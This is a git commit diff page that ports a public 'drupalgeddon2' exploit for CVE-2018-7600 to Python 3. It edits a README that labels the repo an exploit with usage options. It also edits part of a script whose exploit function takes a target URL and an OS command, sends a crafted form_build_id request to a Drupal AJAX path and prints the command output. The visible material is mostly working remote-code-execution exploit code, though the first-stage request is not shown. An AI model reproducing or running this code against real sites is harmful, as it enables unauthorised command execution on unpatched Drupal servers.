Updating to run fine with Python3
John Hammond
parent
6f43311008
commit
d7371964ee
12
README.md
12
README.md
|
|
@ -1,4 +1,16 @@
|
||||||
# drupalgeddon2
|
# drupalgeddon2
|
||||||
|
|
||||||
|
|
||||||
|
This is a duplicate of https://github.com/lorddemon/drupalgeddon2/
|
||||||
|
|
||||||
|
Just tweaked very slightly to work fine with `python3`.
|
||||||
|
|
||||||
|
That's it.
|
||||||
|
|
||||||
|
-----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Exploit for CVE-2018-7600.
|
Exploit for CVE-2018-7600.
|
||||||
|
|
||||||
Usage: drupalgeddon2 options
|
Usage: drupalgeddon2 options
|
||||||
|
|
|
||||||
|
|
@ -1,8 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python3
|
||||||
# coding: utf-8
|
# coding: utf-8
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
|
|
@ -22,9 +20,10 @@ def exploit(url_target,os_command):
|
||||||
parametros = {'q':'file/ajax/name/#value/' + found}
|
parametros = {'q':'file/ajax/name/#value/' + found}
|
||||||
datos = {'form_build_id':found}
|
datos = {'form_build_id':found}
|
||||||
r = requests.post(url_target, data=datos, params=parametros)
|
r = requests.post(url_target, data=datos, params=parametros)
|
||||||
|
|
||||||
r.encoding = 'ISO-8859-1'
|
r.encoding = 'ISO-8859-1'
|
||||||
salida = r.content.split("[{")
|
salida = r.content.split(b"[{")
|
||||||
print salida[0]
|
print(salida[0].decode('ISO-8859-1'))
|
||||||
|
|
||||||
def usage():
|
def usage():
|
||||||
comm = os.path.basename(sys.argv[0])
|
comm = os.path.basename(sys.argv[0])
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue